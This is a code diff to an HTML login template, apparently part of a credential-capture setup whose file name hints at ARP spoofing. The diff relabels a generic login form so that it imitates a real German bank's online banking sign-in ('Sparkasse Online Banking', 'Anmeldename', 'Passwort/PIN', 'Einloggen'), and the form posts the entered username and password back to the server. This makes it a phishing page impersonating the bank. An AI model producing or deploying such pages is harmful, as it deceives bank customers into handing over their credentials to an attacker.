--- a/app/templates/login_arp.html
+++ b/app/templates/login_arp.html
@@ -20,21 +20,21 @@
       </header>
     <div class="login">
     <main class="container">
-        <h2>Login</h2>
+        <h2>Sparkasse Online Banking</h2>
         <form action="/" method="POST">
             <div class="input-field">
                 <input type="text" name="username" id="username"
-                    placeholder="Enter Bank Your Username">
+                    placeholder="Anmeldename">
                 <div class="underline"></div>
             </div>
             <div class="input-field">
                 <input type="password" name="password" id="password"
-                    placeholder="Enter Your Password">
+                    placeholder="Passwort/PIN">
                 <div class="underline"></div>
             </div>
             <div><br></div>
             <div class = "msg"> {{msg}}</div>
-            <input type="submit" value="Continue">
+            <input type="submit" value="Einloggen">
         </form>  
         </div>
     </main>
